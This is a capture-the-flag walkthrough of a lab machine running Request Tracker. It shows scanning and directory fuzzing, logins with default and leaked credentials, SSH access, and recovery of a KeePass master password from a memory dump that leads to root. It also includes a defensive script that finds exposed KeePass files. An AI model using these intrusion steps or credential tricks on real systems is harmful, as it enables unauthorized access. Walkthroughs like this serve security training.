Scanning
sudo nmap -A -T4 -v 10.10.11.227 -oA scans/scan
Open ports: SSH and HTTP.
Discovered open port 22/tcp on 10.10.11.227
Discovered open port 80/tcp on 10.10.11.227
Let's check out HTTP.
After adding tickets.keeper.htb to /etc/hosts:
We're greeted with a login page; the page leaks the OS and the software version:
Best Practical RT 4.4.4
Before diving in here, let's fuzz for directories.
dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 64 -e php,txt,html -f -u http://tickets.keeper.htb
A ton of output
Let's exclude 302 status codes:
dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://tickets.keeper.htb/ -x 302
Much more reasonable:
(dirsearch v0.4.2 banner)
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 220545
Output File: /home/kali/.dirsearch/reports/tickets.keeper.htb/-_23-10-31_09-52-14.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-10-31_09-52-14.log
Target: http://tickets.keeper.htb/
[09:52:14] Starting:
[09:52:19] 200 - 2KB - /m
[09:52:20] 403 - 0B - /l
[09:53:06] 200 - 4KB - /rt
Check out /m.
Mobile version?
Nothing new here really; let's try default creds.
This forum post gives the default password:
root:password
This works!
Poking around I found a new ticket:
Two major clues here
- Debug of keepass program
- The user mentions the software needs updating
A further update to the ticket mentions the user deleted the debug info because of security issues, so we can't get it this way.
Poking around more, we find user: lnorgaard
Default creds in the ticket comments!
lnorgaard:Welcome2023!
Can we SSH?
ssh lnorgaard@10.10.11.227
Welcome2023!
Grabbed user.txt
<redacted>
For root, we know the path already because of the ticket mentioning KeePass. The user's home directory has a .zip in it; we can assume this is the debugging file for the software.
Let's scp it over to our host:
scp lnorgaard@keeper.htb:RT30000.zip .
I was having errors deflating on my host, I’ll just unzip on the target and scp the resulting files.
scp lnorgaard@keeper.htb:KeePassDumpFull.dmp .
scp lnorgaard@keeper.htb:passcodes.kdbx .
Running strings on both didn't turn up anything useful.
Maybe we can extract the password from the mem dump.
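From the defender's side, the finding here is that a KeePass process dump and the password database sat readable in a home directory. The following is an added check, not part of the original writeup: it walks a directory tree and flags KeePass databases by their KDBX file signature and Windows minidump files (MDMP header) that name KeePass.exe in their first few MiB. The sample tree it scans is constructed inline.

```python
import os
import tempfile

MINIDUMP_MAGIC = b"MDMP"                               # Windows minidump header
KDBX_MAGIC = b"\x03\xd9\xa2\x9a\x67\xfb\x4b\xb5"       # KDBX signature (two little-endian words)
KEEPASS_MARKERS = (b"KeePass.exe", "KeePass.exe".encode("utf-16-le"))  # minidump module names are UTF-16LE

def classify_file(path, sniff_bytes=4 * 1024 * 1024):
    """Return a finding label for one file, or None if nothing matched.
    Assumption: only the first sniff_bytes are inspected, which is enough for
    the file signature and usually for the minidump module list."""
    with open(path, "rb") as fh:
        head = fh.read(sniff_bytes)
    if head.startswith(KDBX_MAGIC):
        return "keepass-database"
    if head.startswith(MINIDUMP_MAGIC):
        if any(marker in head for marker in KEEPASS_MARKERS):
            return "keepass-process-dump"
        return "process-dump"
    return None

def scan_tree(root):
    """Map relative path -> finding label for every flagged file under root."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                label = classify_file(path)
            except OSError:
                continue                               # unreadable file: skip, do not crash the sweep
            if label:
                findings[os.path.relpath(path, root)] = label
    return findings

def build_sample_tree():
    """Constructed sample data: a fake minidump naming KeePass, a fake kdbx, a harmless text file."""
    root = tempfile.mkdtemp(prefix="dumpscan_")
    with open(os.path.join(root, "KeePassDumpFull.dmp"), "wb") as fh:
        fh.write(MINIDUMP_MAGIC + b"\x00" * 64 + "KeePass.exe".encode("utf-16-le") + b"\x00" * 64)
    with open(os.path.join(root, "passcodes.kdbx"), "wb") as fh:
        fh.write(KDBX_MAGIC + b"\x00" * 32)
    with open(os.path.join(root, "notes.txt"), "w") as fh:
        fh.write("nothing sensitive here\n")
    return root

if __name__ == "__main__":
    for path, label in sorted(scan_tree(build_sample_tree()).items()):
        print(f"{label:22s} {path}")
```

Point it at /home or a file share instead of the constructed tree to find the same kind of leftover artifacts on a real system.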
We know the KeePass version is out of date because of the ticket from before; I found this:
I would prefer an exploit without dotnet; maybe someone wrote one in Python.
Using this one:
python3 keepass_dump.py -f ../KeePassDumpFull.dmp --skip --debug
dgre med flde
This password does not work. The user information says the employee is Danish; maybe the password is in Danish and the non-ASCII letters are missing from the recovered string.
Google translate:
rødgrød med fløde
Is this the password?
That worked!
Found root password
root:F4><3K0nd!
The password did not work; maybe this key in the notes will.
It's a PuTTY key file; we can convert it with puttygen:
puttygen putty_key.ppk -O private-openssh -o key
That’s root!
cat root.txt
<redacted>